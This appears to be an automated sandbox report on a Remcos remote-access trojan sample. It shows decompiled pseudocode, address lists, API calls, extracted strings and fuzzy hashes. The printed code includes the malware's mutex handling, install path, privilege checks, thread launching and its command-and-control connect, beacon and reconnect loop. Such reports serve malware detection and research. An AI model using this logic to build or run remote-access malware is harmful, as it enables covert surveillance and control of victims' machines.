								} while (_t397 != 0);
								_push(_t397);
								_t215 = E00402489();
								_t216 = L00401F95(0x46c560);
								_t217 = E00402489();
								E00410C80(L00401F95(0x46c518), __eflags, "exepath", _t486, 2 + _t217 * 2, _t216, _t215); // executed
								E0042F4CF(_t486);
								_t501 = _t499 + 0x1c;
								_t465 = 0x46c578;
								L00401E49(0x46c578, _t219, __eflags, 0xd);
								_t449 = "0";
								__eflags = E0040EAD9(__eflags);
								if(__eflags == 0) {
									L47:
									_push(_t272);
									_t129 = L00401F95(L00401E49(_t465, _t449, __eflags, 0x34));
									_t502 = _t501 - 0x18;
									E00402084(_t272, _t502, _t129);
									_push("licence");
									_t450 = L00401F95(0x46c518); // executed
									E00410AA7(0x46c518, _t131); // executed
									_t497 = _t502 + 0x20;
									_t135 = E00436769(_t133, L00401F95(L00401E49(_t465, _t131, __eflags, 0x28)));
									 *0x46bb03 = _t135;
									__eflags = _t135 - 2;
									if(_t135 != 2) {
										__eflags = _t135 - _t272;
										if(__eflags == 0) {
											_t388 = 0;
											__eflags = 0;
											goto L51;
										}
									} else {
										_t388 = _t272;
										L51:
										L00418F59(_t272, _t388, _t450);
										__eflags = 0;
										CreateThread(0, 0,  &M00418D28, 0, 0, 0);
									}
									_t137 = L00401F95(L00401E49(_t465, _t450, __eflags, 0x37));
									_t139 = L00401F95(L00401E49(_t465, _t450, __eflags, 0x10));
									_t141 = L00401F95(L00401E49(_t465, _t450, __eflags, 0xf));
									__eflags =  *_t137;
									_t471 = 0x46c578;
									_t144 = E00436769(_t142, L00401F95(L00401E49(0x46c578, _t450,  *_t137, 0x36)));
									_t146 = L00401F95(L00401E49(0x46c578, _t450, __eflags, 0x11));
									E0040846D(_t139,  *_t141 & 0x000000ff,  *_t139 & 0x000000ff, L00401F95(L00401E49(0x46c578, _t450, __eflags, 0x31)), _t146, _t144, (_t140 & 0xffffff00 | __eflags != 0x00000000) & 0x000000ff); // executed
									__eflags =  *((intOrPtr*)(L00401F95(L00401E49(0x46c578, _t450, __eflags, 0x14)))) - 1;
									if(__eflags != 0) {
										_t461 = CreateThread;
									} else {
										_t199 = 2;
										_t485 = E0042F218(_t450, 0x46c578, __eflags, _t199);
										 *_t485 = 0;
										_t386 = L00401E49(0x46c578, _t450, __eflags, 0x35);
										_t203 = L00401F95(_t386);
										_t461 = CreateThread;
										__eflags =  *_t203;
										 *((char*)(_t485 + 1)) = _t386 & 0xffffff00 | __eflags != 0x00000000;
										CreateThread(0, 0, E00415938, _t485, 0, 0);
										_t471 = 0x46c578;
									}
									__eflags =  *((intOrPtr*)(L00401F95(L00401E49(_t471, _t450, __eflags, 0x16)))) - 1;
									if(__eflags == 0) {
										_t193 = 2;
										_t484 = E0042F218(_t450, _t471, __eflags, _t193);
										 *_t484 = 1;
										_t382 = L00401E49(0x46c578, _t450, __eflags, 0x35);
										_t196 = L00401F95(_t382);
										__eflags =  *_t196;
										__eflags = 0;
										 *((char*)(_t484 + 1)) = _t382 & 0xffffff00 |  *_t196 != 0x00000000;
										CreateThread(0, 0, E00415938, _t484, 0, 0);
										_t471 = 0x46c578;
									}
									__eflags =  *((intOrPtr*)(L00401F95(L00401E49(_t471, _t450, __eflags, 0x23)))) - 1;
									if(__eflags == 0) {
										 *0x46ba75 = 1;
										_t185 = L00401F95(L00401E49(_t471, _t450, __eflags, 0x25));
										_t187 = L00401F95(L00401E49(0x46c578, _t450, __eflags, 0x26));
										_t450 =  *_t185;
										L00401EFA(0x46c0e0,  *_t185, _t185, E0041800F( &_v780,  *_t185, _t187));
										L00401EF0();
										__eflags = 0;
										CreateThread(0, 0, 0x401bcd, 0, 0, 0);
										_t471 = 0x46c578;
									}
									__eflags =  *((intOrPtr*)(L00401F95(L00401E49(_t471, _t450, __eflags, 0x2b)))) - 1;
									if(__eflags == 0) {
										_t471 = L00401F95(L00401E49(_t471, _t450, __eflags, 0x2c));
										_t182 = E00436769(_t180, L00401F95(L00401E49(0x46c578, _t450, __eflags, 0x2d)));
										__eflags =  *_t471;
										_t450 = _t182;
										__eflags =  *_t471 != 0;
										E0040A679(_t182);
									}
									_t160 = E00416D9E( &_v772, _t461, __eflags); // executed
									L00401EFA(0x46c584, _t450, _t471, _t160);
									_t360 =  &_v776;
									L00401EF0();
									_t163 =  *0x46bd14;
									_t269 = 0;
									__eflags = _t163;
									if(_t163 != 0) {
										 *_t163(0); // executed
									}
									CreateThread(_t269, _t269, E0040D0B5, _t269, _t269, _t269); // executed
									__eflags =  *0x46bd4e;
									if( *0x46bd4e != 0) {
										CreateThread(_t269, _t269, E0040FAC7, _t269, _t269, _t269);
									}
									__eflags =  *0x46bd4f;
									if( *0x46bd4f != 0) {
										CreateThread(_t269, _t269, 0x40ffe5, _t269, _t269, _t269);
									}
									_t165 =  *0x46a9d0; // 0x1
									_t166 = _t165 - _t269;
									__eflags = _t166;
									if(__eflags == 0) {
										goto L71;
									} else {
										__eflags = _t166 - 1;
										if(__eflags == 0) {
											_push("Administrator");
											goto L72;
										}
									}
									goto L73;
								} else {
									_t224 = L00401E49(0x46c578, "0", __eflags, 0xd);
									_t506 = _t501 - 0x18;
									_t449 = _t224;
									E004172DA(_t506, _t224);
									_t226 = L0040CE44(__eflags);
									_t501 = _t506 + 0x18;
									__eflags = _t226 - _t272;
									if(__eflags != 0) {
										goto L47;
									} else {
										_t272 = 3;
										goto L45;
									}
								}
							}
						}
					} else {
						_v780 = 0;
						_t265 = E00410885(L00401F95(0x46c518), "WD",  &_v780);
						__eflags = _t265;
						if(_t265 != 0) {
							L00410CE2(L00401F95(0x46c518), __eflags, "WD");
							L0040FD95();
							L71:
							_push("User");
							L72:
							E004075C2(_t269, _t497 - 0x18, "Access level: ", _t461, __eflags, E00402084(_t269,  &_v776));
							E00402084(_t269, _t497 - 4, "[Info]");
							L00416C80(_t269, _t461);
							_t360 =  &_v784;
							L00401FC7(); // executed
							L73:
							E00411929(); // executed
							asm("int3");
							_push(_t471);
							_t481 = _t360 + 0x68;
							E0040D515(_t481);
							_t284 = _t481;
							 *_t284 = 0x460788;
							 *_t284 = 0x460744;
							return E004304F6(_t284);
						} else {
							goto L8;
						}
					}
				} else {
					__eflags =  *((char*)(__ecx + 1)) - 0x6c;
					if(__eflags != 0) {
						goto L6;
					} else {
						__eax =  *(__ecx + 2) & 0x000000ff;
						__eflags = __al;
						if(__eflags != 0) {
							goto L6;
						} else {
							_push(__ecx);
							_push(__ecx);
							__ecx =  &_v700;
							__eax = E0040D544( &_v700, __edx, __eflags, "license_code.txt", 2);
							__ecx = 0x46c578;
							__ecx = L00401E49(0x46c578, __edx, __eflags, 0x34);
							__edx = __eax;
							__ecx =  &_v720;
							__eax = E0040E8BB( &_v720, __edx, __eflags);
							__ecx =  &_v720;
							__eax = E0040D4F5( &_v720, __edx, __eflags);
							__ecx =  &_v720;
							L74();
							__ecx =  &_v744;
							L00401FC7() = 0;
							__eax = 1;
							__eflags = 1;
							L5:
							return _t97;
						}
					}
				}
			}

0x0040c2be
0x0040c2d4
0x0040c2d9
0x0040c2dc
0x0040c2e1
0x0040c2eb
0x0040c2f0
0x0040c2fa
0x0040c303
0x0040c308
0x0040c30c
0x0040c315
0x0040c31a
0x0040c320
0x0040c387
0x0040c387
0x0040c3a5
0x0040c3a8
0x0040c3ca
0x0040c3d0
0x0040c3d8
0x0040c3e1
0x0040c3ea
0x0040c3f9
0x0040c3fe
0x0040c405
0x0040c416
0x0040c418
0x0040c41f
0x0040c426
0x0040c42b
0x0040c42d
0x0040c434
0x0040c43a
0x0040c462
0x0040c46d
0x0040c477
0x0040c479
0x0040c47b
0x0040c483
0x0040c48a
0x0040c48a
0x0040c4a7
0x0040c4a9
0x0040c4b0
0x0040c4b2
0x0040c4bc
0x0040c4be
0x0040c4c3
0x0040c4d5
0x0040c4dc
0x0040c4e4
0x0040c4e6
0x0040c4e9
0x0040c4ef
0x0040c4f5
0x0040c4fa
0x0040c87d
0x0040c881
0x0040c886
0x00000000
0x0040c500
0x0040c500
0x0040c510
0x0040c516
0x0040c51b
0x0040c526
0x0040c52b
0x0040c534
0x0040c539
0x0040c544
0x0040c54d
0x0040c552
0x0040c55b
0x0040c564
0x0040c55d
0x0040c55d
0x0040c55d
0x0040c569
0x0040c56e
0x0040c573
0x0040c575
0x0040c579
0x0040c579
0x0040c57e
0x0040c583
0x0040c587
0x0040c592
0x0040c599
0x0040c59c
0x0040c59e
0x0040c5a4
0x0040c5a6
0x0040c5ac
0x0040c5d0
0x0040c5d2
0x0040c5d7
0x0040c5d8
0x0040c5da
0x0040c5dc
0x0040c5dc
0x0040c5ae
0x0040c5ae
0x0040c5af
0x0040c5b5
0x0040c5b8
0x0040c5ba
0x0040c5ba
0x0040c5b8
0x0040c5ac
0x0040c5a4
0x0040c59c
0x0040c5f1
0x0040c5f4
0x0040c5f6
0x0040c5f6
0x0040c611
0x0040c62a
0x0040c62d
0x0040c644
0x0040c647
0x0040c65e
0x0040c661
0x0040c674
0x0040c677
0x0040c684
0x0040c689
0x0040c689
0x0040c68c
0x0040c68c
0x0040c68f
0x0040c692
0x0040c692
0x0040c697
0x0040c69b
0x0040c6a8
0x0040c6bd
0x0040c6c2
0x0040c6d5
0x0040c6de
0x0040c6e3
0x0040c6e3
0x0040c69b
0x0040c6e8
0x0040c6ec
0x0040c89c
0x0040c8ab
0x0040c8b3
0x0040c8d1
0x0040c8d3
0x0040c8d8
0x0040c8e8
0x0040c8ed
0x00000000
0x0040c6f2
0x0040c6f2
0x0040c6f9
0x0040c78f
0x0040c6ff
0x0040c70a
0x0040c71c
0x0040c731
0x0040c736
0x0040c73e
0x0040c744
0x0040c75c
0x0040c776
0x0040c77d
0x0040c780
0x0040c781
0x0040c781
0x0040c799
0x0040c7a3
0x0040c7ab
0x0040c7ad
0x0040c7ae
0x0040c7b7
0x0040c7ba
0x0040c7bc
0x0040c7ce
0x0040c7be
0x0040c7c4
0x0040c7c9
0x0040c7c9
0x0040c7d5
0x0040c7de
0x0040c7de
0x0040c7e0
0x0040c7e1
0x0040c7e1
0x0040c7e4
0x0040c7e8
0x0040c7ea
0x0040c7ea
0x0040c7ef
0x0040c7f7
0x0040c7ff
0x0040c80a
0x0040c829
0x0040c82f
0x0040c834
0x0040c837
0x0040c840
0x0040c845
0x0040c851
0x0040c853
0x0040c8f2
0x0040c8f2
0x0040c8fe
0x0040c903
0x0040c909
0x0040c90e
0x0040c91d
0x0040c91f
0x0040c924
0x0040c938
0x0040c943
0x0040c949
0x0040c94b
0x0040c951
0x0040c953
0x0040c955
0x0040c955
0x00000000
0x0040c955
0x0040c94d
0x0040c94d
0x0040c957
0x0040c957
0x0040c95c
0x0040c968
0x0040c968
0x0040c975
0x0040c987
0x0040c999
0x0040c99e
0x0040c9a3
0x0040c9c0
0x0040c9d2
0x0040c9f1
0x0040ca09
0x0040ca0b
0x0040ca54
0x0040ca0d
0x0040ca0f
0x0040ca16
0x0040ca22
0x0040ca29
0x0040ca2b
0x0040ca30
0x0040ca36
0x0040ca48
0x0040ca4b
0x0040ca4d
0x0040ca4d
0x0040ca6a
0x0040ca6c
0x0040ca70
0x0040ca77
0x0040ca81
0x0040ca88
0x0040ca8a
0x0040ca8f
0x0040ca95
0x0040caa1
0x0040caa4
0x0040caa6
0x0040caa6
0x0040cabb
0x0040cabd
0x0040cac3
0x0040cad0
0x0040cae5
0x0040caea
0x0040cafd
0x0040cb06
0x0040cb0b
0x0040cb17
0x0040cb19
0x0040cb19
0x0040cb2e
0x0040cb30
0x0040cb49
0x0040cb58
0x0040cb5d
0x0040cb60
0x0040cb63
0x0040cb66
0x0040cb66
0x0040cb6f
0x0040cb7a
0x0040cb7f
0x0040cb83
0x0040cb88
0x0040cb8d
0x0040cb8f
0x0040cb91
0x0040cb94
0x0040cb94
0x0040cba0
0x0040cba2
0x0040cba9
0x0040cbb5
0x0040cbb5
0x0040cbb7
0x0040cbbe
0x0040cbca
0x0040cbca
0x0040cbcc
0x0040cbd1
0x0040cbd1
0x0040cbd3
0x00000000
0x0040cbd5
0x0040cbd5
0x0040cbd8
0x0040cbda
0x00000000
0x0040cbda
0x0040cbd8
0x00000000
0x0040c859
0x0040c85d
0x0040c862
0x0040c865
0x0040c869
0x0040c86e
0x0040c873
0x0040c876
0x0040c878
0x00000000
0x0040c87a
0x0040c87c
0x00000000
0x0040c87c
0x0040c878
0x0040c853
0x0040c6ec
0x0040c43c
0x0040c440
0x0040c453
0x0040c45a
0x0040c45c
0x0040cbef
0x0040cbf9
0x0040cbfe
0x0040cbfe
0x0040cc03
0x0040cc17
0x0040cc26
0x0040cc2b
0x0040cc33
0x0040cc37
0x0040cc3c
0x0040cc3c
0x0040cc41
0x0040cc42
0x0040cc43
0x0040cc48
0x0040cc4d
0x0040e032
0x0040c177
0x0040c183
0x00000000
0x00000000
0x00000000
0x0040c45c
0x0040c322
0x0040c322
0x0040c326
0x00000000
0x0040c328
0x0040c328
0x0040c32c
0x0040c32e
0x00000000
0x0040c330
0x0040c330
0x0040c331
0x0040c339
0x0040c33d
0x0040c344
0x0040c34e
0x0040c355
0x0040c357
0x0040c35b
0x0040c360
0x0040c364
0x0040c369
0x0040c36d
0x0040c372
0x0040c37b
0x0040c37d
0x0040c37d
0x0040c37e
0x0040c384
0x0040c384
0x0040c32e
0x0040c326

APIs

OpenMutexA.KERNEL32 ref: 0040C471
WaitForSingleObject.KERNEL32(00000000,0000EA60), ref: 0040C483
CloseHandle.KERNEL32(00000000), ref: 0040C48A
CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,0000000E), ref: 0040C4E9
GetLastError.KERNEL32 ref: 0040C4EF
GetModuleFileNameW.KERNEL32(00000000,C:\Windows\SysWOW64\logagent.exe,00000104), ref: 0040C510

Part of subcall function 0040E8BB: __EH_prolog.LIBCMT ref: 0040E8C0

Strings

Software\, xrefs: 0040C3B5
Inj, xrefs: 0040C494, 0040C49F, 0040C4B4
(32 bit), xrefs: 0040C564
Exe, xrefs: 0040C3F4
Access level: , xrefs: 0040CC0F
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0040C521
origmsc, xrefs: 0040C5C1
Administrator, xrefs: 0040CBDA
User, xrefs: 0040CBFE
Remcos, xrefs: 0040C60C
exepath, xrefs: 0040C81D, 0040C8C7
ProductName, xrefs: 0040C51C
(64 bit), xrefs: 0040C55D
C:\Windows\SysWOW64\logagent.exe, xrefs: 0040C50A, 0040C785
Octopus-GM39UT, xrefs: 0040C4CD
licence, xrefs: 0040C90E
Remcos_Mutex_Inj, xrefs: 0040C462
Exe, xrefs: 0040C3EF
[Info], xrefs: 0040CC21
license_code.txt, xrefs: 0040C334

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Mutex$CloseCreateErrorFileH_prologHandleLastModuleNameObjectOpenSingleWait
String ID: (32 bit)$ (64 bit)$Access level: $Administrator$C:\Windows\SysWOW64\logagent.exe$Exe$Exe$Inj$Octopus-GM39UT$ProductName$Remcos$Remcos_Mutex_Inj$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Software\$User$[Info]$exepath$licence$license_code.txt$origmsc
API String ID: 1247502528-3937525246
Opcode ID: 8b3f7329c46b1e9529f9da8098eb2aead49ba47a864d83bed9ed11ed871e0adb
Instruction ID: 97ecaa49e5e083256040f844ff0fd3ae96e39466cf8f0e182fdc5e320802d438
Opcode Fuzzy Hash: 8b3f7329c46b1e9529f9da8098eb2aead49ba47a864d83bed9ed11ed871e0adb
Instruction Fuzzy Hash: 5432F460B443516BDA1577729CA6B3F26898B8170CF04053FB542BB2E3EE7C9D4583AE

Uniqueness

Uniqueness Score: -1.00%

Function 00411929, Relevance: 30.5, APIs: 6, Strings: 11, Instructions: 743
sleepnetworkthreadCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00411929() {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v20;
				char _v32;
				char _v56;
				char _v80;
				char _v104;
				char _v128;
				char _v140;
				void* _v163;
				char _v164;
				char _v188;
				char _v212;
				char _v236;
				char _v260;
				char _v284;
				char _v308;
				char _v332;
				char _v356;
				char _v380;
				char _v404;
				char _v428;
				char _v452;
				char _v476;
				char _v500;
				char _v524;
				char _v548;
				char _v572;
				char _v596;
				char _v620;
				char _v644;
				char _v668;
				char _v692;
				char _v716;
				char _v740;
				char _v764;
				char _v788;
				char _v812;
				char _v836;
				char _v860;
				char _v884;
				char _v908;
				char _v932;
				char _v956;
				char _v980;
				char _v1004;
				char _v1028;
				char _v1052;
				char _v1076;
				char _v1100;
				char _v1124;
				char _v1148;
				char _v1172;
				char _v1196;
				char _v1220;
				char _v1244;
				char _v1268;
				char _v1292;
				char _v1316;
				char _v1340;
				char _v1364;
				char _v1388;
				char _v1412;
				char _v1436;
				char _v2436;
				signed int _t166;
				void* _t168;
				long _t172;
				void* _t174;
				signed char _t178;
				void* _t184;
				short _t195;
				void* _t197;
				void* _t198;
				void* _t200;
				long _t204;
				short _t209;
				void* _t210;
				void* _t212;
				void* _t225;
				void* _t233;
				void* _t234;
				void* _t237;
				intOrPtr* _t238;
				void* _t241;
				void* _t242;
				void* _t243;
				void* _t246;
				void* _t248;
				void* _t251;
				void* _t252;
				void* _t253;
				void* _t254;
				void* _t256;
				void* _t257;
				void* _t258;
				intOrPtr* _t353;
				void* _t367;
				void* _t369;
				void* _t371;
				void* _t373;
				void* _t375;
				long _t379;
				void* _t380;
				void* _t381;
				char* _t401;
				void* _t616;
				void* _t625;
				void* _t677;
				signed short _t681;
				struct _SECURITY_ATTRIBUTES* _t684;
				void* _t694;
				void* _t695;
				void* _t696;
				void* _t697;
				void* _t698;
				void* _t699;
				void* _t700;
				void* _t701;
				void* _t703;
				void* _t704;
				void* _t708;
				void* _t709;
				void* _t710;
				void* _t711;
				void* _t712;
				long _t714;

				_push(_t380);
				E004020D5(_t380,  &_v104);
				L00416FDC( &_v236, _t616);
				E004020D5(_t380,  &_v1436);
				_t677 = 0x46c578;
				_t166 = E00436769(_t164, L00401F95(L00401E49(0x46c578, _t616, _t712, 0x29)));
				if(_t166 != 0) {
					_t379 = _t166 * 0x3e8;
					_t714 = _t379;
					Sleep(_t379);
				}
				_t695 = _t694 - 0x18;
				E00402084(_t380, _t695, 0x4657ec);
				_t168 = L00401E49(_t677, _t616, _t714, 0);
				_t696 = _t695 - 0x18;
				E004020EC(_t380, _t696, _t616, _t714, _t168);
				E00417478( &_v32, _t616);
				_t697 = _t696 + 0x30;
				_t684 = 0;
				_v8 = 0;
				_t381 = 0;
				L00401E49(_t677, _t616, _t714, 0x3a);
				_t617 = 0x45f6bc;
				_t172 = E0040EAD9(_t714);
				_t715 = _t172;
				if(_t172 != 0) {
					L00401E49(_t677, 0x45f6bc, _t715, 0x3a);
					_t367 = E00402489();
					_t369 = L00401F95(L00401E49(_t677, 0x45f6bc, _t715, 0x3a));
					L00401E49(_t677, 0x45f6bc, _t715, 0x39);
					_t371 = E00402489();
					_t373 = L00401F95(L00401E49(_t677, _t617, _t715, 0x39));
					L00401E49(_t677, _t617, _t715, 0x38);
					_t375 = E00402489();
					L00401F95(L00401E49(_t677, _t617, _t715, 0x38));
					_t617 = _t375;
					E00404882(_t375, _t373, _t371, _t369, _t367);
					_t697 = _t697 + 0x10;
					_t684 = 0;
				}
				L4:
				_t698 = _t697 - 0x18;
				E00402084(_t381, _t698, 0x4657f0);
				_t174 = L00401E49( &_v32, _t617, _t715, _t381);
				_t699 = _t698 - 0x18;
				E004020EC(_t381, _t699, _t617, _t715, _t174);
				E00417478( &_v20, _t617);
				_t697 = _t699 + 0x30;
				L00401E49( &_v20, _t617, _t715, 2);
				_t618 = "0";
				_t178 = E00405A6F("0");
				asm("sbb al, al");
				 *0x46bae0 =  ~_t178 + 1;
				E0040498B(0x46c780);
				if(_t684 >= 0 || E004021F5( &_v32) > 1) {
					_t718 =  *0x46c781 - 1;
					_t401 =  &_v104;
					if( *0x46c781 != 1) {
						_push(0x45f6bc);
					} else {
						_push(" (TLS)");
					}
					E00405A0B(_t381, _t401);
					_t700 = _t697 - 0x18;
					_t184 = L00401E49( &_v20, _t618, _t718, 1);
					_t617 = L00402F93(_t381,  &_v128, E00405343(_t381,  &_v56, E004075E6( &_v80, "Connecting to ", _t718, L00401E49( &_v20, _t618, _t718, 0)), _t677, _t718, 0x4657f0), _t718, _t184);
					L00402F93(_t381, _t700, _t188, _t718,  &_v104);
					_t701 = _t700 - 0x14;
					E00402084(_t381, _t701, "[Info]");
					L00416C80(_t381, _t677);
					_t697 = _t701 + 0x30;
					L00401FC7();
					L00401FC7();
					L00401FC7();
					_t684 = _v8;
				}
				_t195 = 2;
				 *0x46bacc = _t195;
				_t197 = L00401F95(L00401E49( &_v20, _t617, _t718, 0));
				__imp__#52(_t197); // executed
				_t719 = _t197;
				if(_t197 != 0) {
					E004324E0(0x46bad0,  *((intOrPtr*)( *((intOrPtr*)(_t197 + 0xc)))),  *((short*)(_t197 + 0xa)));
					_t209 = E00436769(_t207, L00401F95(L00401E49( &_v20, _t617, _t719, 1)));
					__imp__#9();
					_t697 = _t697 + 0xc - 0x10;
					 *0x46bace = _t209;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t210 = E00404A08(_t617, _t209); // executed
					_t720 = _t210;
					if(_t210 != 0) {
						_t703 = _t697 - 0x18;
						_t212 = L00401E49( &_v20, _t617, _t720, 1);
						_t625 = L00402F93(_t381,  &_v56, E00405343(_t381,  &_v188, E004075E6( &_v212, "Connected to  ", _t720, L00401E49( &_v20, _t617, _t720, 0)), 0x46c780, _t720, 0x4657f0), _t720, _t212);
						L00402F93(_t381, _t703, _t625, _t720,  &_v104);
						_t704 = _t703 - 0x14;
						E00402084(_t381, _t704, "[Info]");
						L00416C80(_t381, 0x46c780);
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00404E9A(0x46c780, 0xa, 0);
						_v164 = 0;
						asm("stosd");
						_v8 = 1;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t225 = L00416EFA(0x46c780);
						_push(_t625);
						E00411912( &_v164, "%I64u", _t225);
						E00407350(_t381,  &_v128, _t625, _t720, 0x46c3b0);
						E0043BACE( &_v128,  *0x46a9d0,  &_v140, 0xa);
						E004020EC(_t381,  &_v80, _t625, _t720, L00401E49(0x46c578, _t625, _t720, 1));
						_t233 = E00402489();
						_t234 = L00401F95(0x46c560);
						_t237 = E00410A30(L00401F95(0x46c518), "name",  &_v2436, 0x104, _t234, _t233);
						_t708 = _t704 + 0x60;
						if(_t237 != 0) {
							E00405A0B(_t381,  &_v80,  &_v2436);
						}
						_t238 =  *0x46bd44; // 0x0
						_t681 = 0;
						_t722 = _t238;
						if(_t238 != 0) {
							_t681 =  *_t238() & 0x0000ffff;
						}
						E0040427F(_t381,  &_v56, "C:\Windows\SysWOW64\logagent.exe");
						_t709 = _t708 - 0x18;
						_t241 = E0041739C(_t381,  &_v1412, 0x46c500);
						_t242 = E00417226(_t381,  &_v1388, _t681 & 0x0000ffff);
						_t243 = L00401E49( &_v20, _t681 & 0x0000ffff, _t722, 0);
						_t246 = E00417226(_t381,  &_v1364, GetTickCount());
						_t248 = E00417226(_t381,  &_v1340, E004171D6( &_v1364));
						_t251 = E0041739C(_t381,  &_v1292, E0041719C( &_v1316));
						_t252 = E0041739C(_t381,  &_v1268, 0x46c0e0);
						_t253 = E0041739C(_t381,  &_v1244,  &_v56);
						_t254 = E0041739C(_t381,  &_v1220,  &_v128);
						_t256 = E0041739C(_t381,  &_v1196, 0x46c880);
						_t257 = E0040D1E5( &_v1172);
						_t258 = E0041739C(_t381,  &_v1148, 0x46c584);
						_t617 = L00402F93(_t381,  &_v212, L00402F93(_t381,  &_v188, L00402F93(_t381,  &_v260, L00402F1D( &_v284, L00402F93(_t381,  &_v308, L00402F1D( &_v332, L00402F93(_t381,  &_v356, L00402F93(_t381,  &_v380, L00402F93(_t381,  &_v404, L00402F93(_t381,  &_v428, L00402F93(_t381,  &_v452, E00405343(_t381,  &_v476, L00402F93(_t381,  &_v500, L00402F1D( &_v524, L00402F93(_t381,  &_v548, L00402F1D( &_v572, L00402F93(_t381,  &_v596, E0040759C(_t381,  &_v620, L00402F93(_t381,  &_v644, L00402F1D( &_v668, L00402F93(_t381,  &_v692, L00402F1D( &_v716, L00402F93(_t381,  &_v740, L00402F1D( &_v764, L00402F93(_t381,  &_v788, L00402F1D( &_v812, L00402F93(_t381,  &_v836, E00405343(_t381,  &_v860, L00402F93(_t381,  &_v884, E00405343(_t381,  &_v908, L00402F93(_t381,  &_v932, L00402F1D( &_v956, L00402F93(_t381,  &_v980, L00402F93(_t381,  &_v1004, L00402F93(_t381,  &_v1028, L00402F1D( &_v1052, L00402F93(_t381,  &_v1076, L00402F1D( &_v1100, L00402FB7( &_v1124,  &_v80, 0x46c238), _t258), _t722, 0x46c238), _t257), _t722, 0x46c238), _t722, 0x46c5b4), _t722, 0x46c238), _t256), _t722, 0x46c238), 0x46c238, _t722,  &_v164), _t722, 0x46c238), 0x46c238, _t722, "3.2.1 Pro"), _t722, 0x46c238), _t254), _t722, 0x46c238), _t253), _t722, 0x46c238), _t252), _t722, 0x46c238), _t251), _t722, 0x46c238), 0x46c238, _t722,  *0x46a9d4 & 0x000000ff), _t722, 0x46c238), _t248), _t722, 0x46c238), _t246), _t722, 0x46c238), 0x46c238, _t722,  &_v140), _t722, 0x46c238), _t722, _t243), _t722, 0x46c238), _t722, "Octopus-GM39UT"), _t722, 0x46c238), _t242), _t722, 0x46c238), _t241), _t722, 0x46c238), _t722,  &_v236), _t722, 0x46c238);
						L00402F93(_t381, _t709, _t297, _t722, "Exe");
						_push(0x4b);
						L00404AA4(_t381, 0x46c780, _t297, _t722);
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401EF0();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401EF0();
						L00404BBE(0x46c780, _t297, E004123B9, 1);
						_t353 =  *0x46bd48; // 0x0
						if(_t353 != 0 &&  *0x46bd4d != 0) {
							_t353 =  *_t353();
							 *0x46bd4d = 0;
						}
						if( *0x46c39a != 0) {
							_t353 = E0040951E(_t381, 0x46c350);
						}
						E004059C5(_t353);
						_t710 = _t709 - 0x18;
						E00402084(_t381, _t710, "Disconnected!");
						_t711 = _t710 - 0x18;
						E00402084(_t381, _t711, "[Info]");
						L00416C80(_t381, 0x46c238);
						_t697 = _t711 + 0x30;
						if( *0x46bea4 != 0) {
							CreateThread(0, 0, E0041667F, 0, 0, 0);
						}
						L00401FC7();
						L00401EF0();
					}
					_t684 = _v8;
					_t677 = 0x46c578;
				}
				_t684 = _t684 - 1;
				_v8 = _t684;
				_t381 = _t381 + 1;
				_t198 = E004021F5( &_v32);
				_t728 = _t381 - _t198;
				if(_t381 >= _t198) {
					_t200 = 2;
					_t381 = 0;
					_t204 = E00436769(_t201, L00401F95(L00401E49(_t677, _t617, _t728, _t200))) * 0x3e8;
					_t715 = _t204;
					Sleep(_t204); // executed
				}
				L00401E74( &_v20, _t617);
				goto L4;
			}

0x00411935
0x00411938
0x00411943
0x0041194e
0x00411953
0x00411969
0x00411971
0x00411973
0x00411973
0x0041197a
0x0041197a
0x00411980
0x0041198a
0x00411993
0x00411998
0x0041199e
0x004119a6
0x004119ab
0x004119ae
0x004119b2
0x004119b5
0x004119b9
0x004119be
0x004119c5
0x004119ca
0x004119cc
0x004119d2
0x004119d9
0x004119ea
0x004119f4
0x004119fb
0x00411a0c
0x00411a16
0x00411a1d
0x00411a2f
0x00411a34
0x00411a38
0x00411a3d
0x00411a40
0x00411a40
0x00411a42
0x00411a42
0x00411a4c
0x00411a55
0x00411a5a
0x00411a60
0x00411a68
0x00411a6d
0x00411a75
0x00411a7a
0x00411a81
0x00411a8d
0x00411a91
0x00411a96
0x00411a9d
0x00411ab0
0x00411ab7
0x00411aba
0x00411ac3
0x00411abc
0x00411abc
0x00411abc
0x00411ac8
0x00411acd
0x00411adb
0x00411b15
0x00411b19
0x00411b1e
0x00411b28
0x00411b2d
0x00411b32
0x00411b38
0x00411b40
0x00411b48
0x00411b4d
0x00411b4d
0x00411b52
0x00411b58
0x00411b65
0x00411b6b
0x00411b71
0x00411b73
0x00411b88
0x00411ba2
0x00411ba9
0x00411baf
0x00411bb2
0x00411bbf
0x00411bc0
0x00411bc1
0x00411bc2
0x00411bca
0x00411bcf
0x00411bd1
0x00411bd7
0x00411be5
0x00411c25
0x00411c29
0x00411c2e
0x00411c38
0x00411c3d
0x00411c48
0x00411c53
0x00411c5e
0x00411c69
0x00411c6e
0x00411c7f
0x00411c81
0x00411c84
0x00411c85
0x00411c86
0x00411c87
0x00411c88
0x00411c8d
0x00411c9b
0x00411cab
0x00411cbf
0x00411cd6
0x00411ce2
0x00411cea
